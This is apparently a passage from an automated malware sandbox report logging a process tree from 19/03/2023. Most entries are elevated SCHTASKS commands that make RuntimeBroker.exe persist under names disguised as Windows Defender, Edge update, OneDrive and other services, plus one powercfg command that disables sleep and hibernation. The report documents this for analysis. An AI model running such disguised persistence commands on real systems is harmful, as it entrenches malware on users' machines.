                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    Imagebase:0x7ff745070000
                                                                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                                                    Start time:00:17:15
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                                                                                                                    Imagebase:0xb0000
                                                                                                                                                                                                                    File size:232960 bytes
                                                                                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:10
                                                                                                                                                                                                                    Start time:00:17:15
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                                                                                                                    Imagebase:0xb0000
                                                                                                                                                                                                                    File size:232960 bytes
                                                                                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                                                    Start time:00:17:15
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    Imagebase:0x7ff745070000
                                                                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:12
                                                                                                                                                                                                                    Start time:00:17:15
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                                                                                                                    Imagebase:0xff0000
                                                                                                                                                                                                                    File size:185856 bytes
                                                                                                                                                                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:13
                                                                                                                                                                                                                    Start time:00:17:15
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    Imagebase:0x7ff745070000
                                                                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                                                    Start time:00:17:15
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                                                                                                                    Imagebase:0xb0000
                                                                                                                                                                                                                    File size:232960 bytes
                                                                                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:15
                                                                                                                                                                                                                    Start time:00:17:15
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                                                                                                                    Imagebase:0xff0000
                                                                                                                                                                                                                    File size:185856 bytes
                                                                                                                                                                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:16
                                                                                                                                                                                                                    Start time:00:17:15
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                                                                                                                    Imagebase:0xff0000
                                                                                                                                                                                                                    File size:185856 bytes
                                                                                                                                                                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:17
                                                                                                                                                                                                                    Start time:00:17:15
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                                                                                                                    Imagebase:0xff0000
                                                                                                                                                                                                                    File size:185856 bytes
                                                                                                                                                                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:18
                                                                                                                                                                                                                    Start time:00:17:15
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                                                                                                                    Imagebase:0xb0000
                                                                                                                                                                                                                    File size:232960 bytes
                                                                                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:19
                                                                                                                                                                                                                    Start time:00:17:15
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    Imagebase:0x7ff745070000
                                                                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:20
                                                                                                                                                                                                                    Start time:00:17:15
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                                                                                                                    Imagebase:0xb0000
                                                                                                                                                                                                                    File size:232960 bytes
                                                                                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:21
                                                                                                                                                                                                                    Start time:00:17:15
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    Imagebase:0x7ff745070000
                                                                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:22
                                                                                                                                                                                                                    Start time:00:17:15
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                                                                                                                    Imagebase:0xff0000
                                                                                                                                                                                                                    File size:185856 bytes
                                                                                                                                                                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:23
                                                                                                                                                                                                                    Start time:00:17:15
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                                                                                                                    Imagebase:0xb0000
                                                                                                                                                                                                                    File size:232960 bytes
                                                                                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:24
                                                                                                                                                                                                                    Start time:00:17:15
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    Imagebase:0x7ff745070000
                                                                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:25
                                                                                                                                                                                                                    Start time:00:17:16
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                                                                                                                    Imagebase:0xff0000
                                                                                                                                                                                                                    File size:185856 bytes
                                                                                                                                                                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:26
                                                                                                                                                                                                                    Start time:00:17:16
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    Imagebase:0x7ff745070000
                                                                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:27
                                                                                                                                                                                                                    Start time:00:17:16
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk697" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                                                                                                                    Imagebase:0xb0000
                                                                                                                                                                                                                    File size:232960 bytes
                                                                                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:28
                                                                                                                                                                                                                    Start time:00:17:16
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                                                                                                                    Imagebase:0xff0000
                                                                                                                                                                                                                    File size:185856 bytes
                                                                                                                                                                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:29
                                                                                                                                                                                                                    Start time:00:17:16
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                                                                                                                    Imagebase:0xff0000
                                                                                                                                                                                                                    File size:185856 bytes
                                                                                                                                                                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:30
                                                                                                                                                                                                                    Start time:00:17:17
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk64" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                                                                                                                    Imagebase:0xb0000
                                                                                                                                                                                                                    File size:232960 bytes
                                                                                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:31
                                                                                                                                                                                                                    Start time:00:17:18
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    Imagebase:0x7ff745070000
                                                                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:32
                                                                                                                                                                                                                    Start time:00:17:18
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk620" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                                                                                                                    Imagebase:0xb0000
                                                                                                                                                                                                                    File size:232960 bytes
                                                                                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:33
                                                                                                                                                                                                                    Start time:00:17:18
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    Imagebase:0x7ff745070000
                                                                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:34
                                                                                                                                                                                                                    Start time:00:17:18
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                                                                                                                    Imagebase:0xb0000
                                                                                                                                                                                                                    File size:232960 bytes
                                                                                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:35
                                                                                                                                                                                                                    Start time:00:17:19
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    Imagebase:0x7ff745070000
                                                                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:36
                                                                                                                                                                                                                    Start time:00:17:19
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                                                                                                                    Imagebase:0x7ff651c80000
                                                                                                                                                                                                                    File size:51288 bytes
                                                                                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:37
                                                                                                                                                                                                                    Start time:00:17:19
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                                                                                                                                                                    Imagebase:0x7ff651c80000
                                                                                                                                                                                                                    File size:51288 bytes
                                                                                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:38
                                                                                                                                                                                                                    Start time:00:17:20
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                                                                                                                    Imagebase:0xb0000
                                                                                                                                                                                                                    File size:232960 bytes
                                                                                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:39
                                                                                                                                                                                                                    Start time:00:17:20
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    Imagebase:0x7ff745070000
                                                                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:40
                                                                                                                                                                                                                    Start time:00:17:20
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk697" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                                                                                                                    Imagebase:0xff0000
                                                                                                                                                                                                                    File size:185856 bytes
                                                                                                                                                                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:41
                                                                                                                                                                                                                    Start time:00:17:20
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                                                                                                                    Imagebase:0xb0000
                                                                                                                                                                                                                    File size:232960 bytes
                                                                                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:42
                                                                                                                                                                                                                    Start time:00:17:20
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    Imagebase:0x7ff745070000
                                                                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:43
                                                                                                                                                                                                                    Start time:00:17:20
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk64" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                                                                                                                    Imagebase:0xff0000
                                                                                                                                                                                                                    File size:185856 bytes
                                                                                                                                                                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:44
                                                                                                                                                                                                                    Start time:00:17:20
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
